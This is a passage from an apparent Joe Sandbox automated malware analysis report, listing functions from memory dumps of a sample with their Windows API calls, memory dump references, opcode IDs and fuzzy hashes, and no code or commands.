                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                                                                                  • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                                                                                                                  • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                                                                                  • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                                                                                                                  Function 00AB39A3 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AB399E,?,?,00000008,?,?,00AB1CF4,00000000), ref: 00AB3BD0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                  • Opcode ID: f3cf5f771349bf8ebeb3ac5739d3ac5e231c142fd5f5321c95d1e107bfb400fe
                                                                                                                                                  • Instruction ID: ef46625009f3024a1ed92c7101c7f426fd9dbe959c06b4052e02428e04ec9048
                                                                                                                                                  • Opcode Fuzzy Hash: f3cf5f771349bf8ebeb3ac5739d3ac5e231c142fd5f5321c95d1e107bfb400fe
                                                                                                                                                  • Instruction Fuzzy Hash: 7BB11D321106089FDB15CF28C48ABA57BE4FF45364F25865CE8DACF2A2C735DA95CB40
                                                                                                                                                  Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: mouse_event
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2434400541-0
                                                                                                                                                  • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                                                                                  • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                                                                                                                                  • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                                                                                  • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                                                                                                                                  Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LogonUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1244722697-0
                                                                                                                                                  • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                                                                                  • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                                                                                                                  • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                                                                                  • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                                                                                                                                  Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                                                                                  • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                                                                                                                  • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                                                                                  • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                                                                                                                  Function 00AAC7F0 Relevance: .9, Instructions: 853COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 44dc27fcbe7fd6b5fcc9a8f97fa6612ef5537593baa27d9728e77007d9c8b16a
                                                                                                                                                  • Instruction ID: 657ef41db75ec8abfbadfc547736c3d2e96703de55ce049220683effc52d235e
                                                                                                                                                  • Opcode Fuzzy Hash: 44dc27fcbe7fd6b5fcc9a8f97fa6612ef5537593baa27d9728e77007d9c8b16a
                                                                                                                                                  • Instruction Fuzzy Hash: 36822E76B083108BD748DF18D89075EF7E2ABCC314F1A893DA999E7354DA74EC118B86
                                                                                                                                                  Function 00AB00D9 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ad5aee49de51e62de7c95714716719574099b53ca3c25a1455185705a6b8fcfe
                                                                                                                                                  • Instruction ID: 0acf6f8ac71b53bda6553fff6b3f4595de84c37104406a01fbb3dc4360e41687
                                                                                                                                                  • Opcode Fuzzy Hash: ad5aee49de51e62de7c95714716719574099b53ca3c25a1455185705a6b8fcfe
                                                                                                                                                  • Instruction Fuzzy Hash: 8C32F022D29F414DD7239635D822776A25CAFB73C4F16D727E81AB5EA6EF28C5C34200
                                                                                                                                                  Function 00418808 Relevance: .6, Instructions: 590COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                                                                                  • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                                                                                                                                  • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                                                                                  • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                                                                                                                                  Function 004221C5 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                  • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                                                                                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                  • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                                                                                                                                  Function 00A751EE Relevance: .3, Instructions: 344COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                                                                                                                  • Instruction ID: 2e0bbc56ef757260324170f90567a80bb18125bfb7be6c338a2c883e8a3ed44a
                                                                                                                                                  • Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                                                                                                                  • Instruction Fuzzy Hash: 21D17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82
                                                                                                                                                  Function 004225FA Relevance: .3, Instructions: 341COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                  • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                                                                                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                  • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                                                                                                                                  Function 00A76EAF Relevance: .2, Instructions: 230COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                                                                                                                  • Instruction ID: 1bf3e2a715f1775a2e489b1f230c6c4133871ece6c98770d03cfc4c53e8cbc29
                                                                                                                                                  • Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                                                                                                                  • Instruction Fuzzy Hash: E4A192B29093109FC344CF1AD88055BBBE2BFC8614F5AC96EF89897315D730E9458F8A
                                                                                                                                                  Function 00AA5980 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                                                                                                  • Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
                                                                                                                                                  • Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                                                                                                  • Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792
                                                                                                                                                  Function 00A77F80 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 57a85e8b12e82fb41159f56d97629d3c102e4caf28362fdc83b8f9dd0bf449d7
                                                                                                                                                  • Instruction ID: f2aa86b5088524225bca57406a5d1397d8899325cb8a078ba8ccbdd46887f550
                                                                                                                                                  • Opcode Fuzzy Hash: 57a85e8b12e82fb41159f56d97629d3c102e4caf28362fdc83b8f9dd0bf449d7
                                                                                                                                                  • Instruction Fuzzy Hash: 6E6102359287A44BC316EF3DEC416BAB394FFE6384F54C73EEA8562AA1DB3415068344
                                                                                                                                                  Function 0055C594 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                  • Instruction ID: 297c42746ce6ffc5d2f8a126e26e4f05b1c83496421ee1d12b76a76bc897e528
                                                                                                                                                  • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                  • Instruction Fuzzy Hash: 1E3146329053405ECF328AAC98746B53F64BB62777F1D21A7EC419B192F221BE4CC6A0
                                                                                                                                                  Function 00A77B71 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5c43cf1957d3bc441ab92b017139291c580ea0826359af548bc1dc2c5e6896f3
                                                                                                                                                  • Instruction ID: 314dd83f6ad7259ddaea2a45ad32d70ac6da9fe99edca33744150a5492d51df5
                                                                                                                                                  • Opcode Fuzzy Hash: 5c43cf1957d3bc441ab92b017139291c580ea0826359af548bc1dc2c5e6896f3
                                                                                                                                                  • Instruction Fuzzy Hash: A841E7306483554FC728EF29E8E467BB3D1FBC9315F65893ED6C683281CA386416CB51
                                                                                                                                                  Function 00AA3780 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                                                                                                  • Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
                                                                                                                                                  • Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                                                                                                  • Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92
                                                                                                                                                  Function 00AAD580 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                                                                                                  • Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
                                                                                                                                                  • Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                                                                                                  • Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94
                                                                                                                                                  Function 00BF9650 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                  • Instruction ID: f2db7853595e1a06e118b7615eb5f70a8bd784dd372968c1087cbf83a1baa70e
                                                                                                                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                  • Instruction Fuzzy Hash: BE41A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                                                                  Function 00BF94E0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                  • Instruction ID: 022197080262dcb74295c545e5ad403c58f764df0ba37eedbad2e7d669b6a3fa
                                                                                                                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                  • Instruction Fuzzy Hash: 1C018079A01209EFCB48DF98C5909AEF7F5FB58310F2085DAE909A7741D730AE41DB80
                                                                                                                                                  Function 00BF9540 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                  • Instruction ID: 5ee726c0e0e4ac96ef20b6470aae070e0619b57094b2eb40580fb129df3ad67a
                                                                                                                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                  • Instruction Fuzzy Hash: 45019278A01209EFCB44DF98C5909AEF7F5FB58310F2085D9E909A7741D730AE41DB80
                                                                                                                                                  Function 00BF7EC0 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
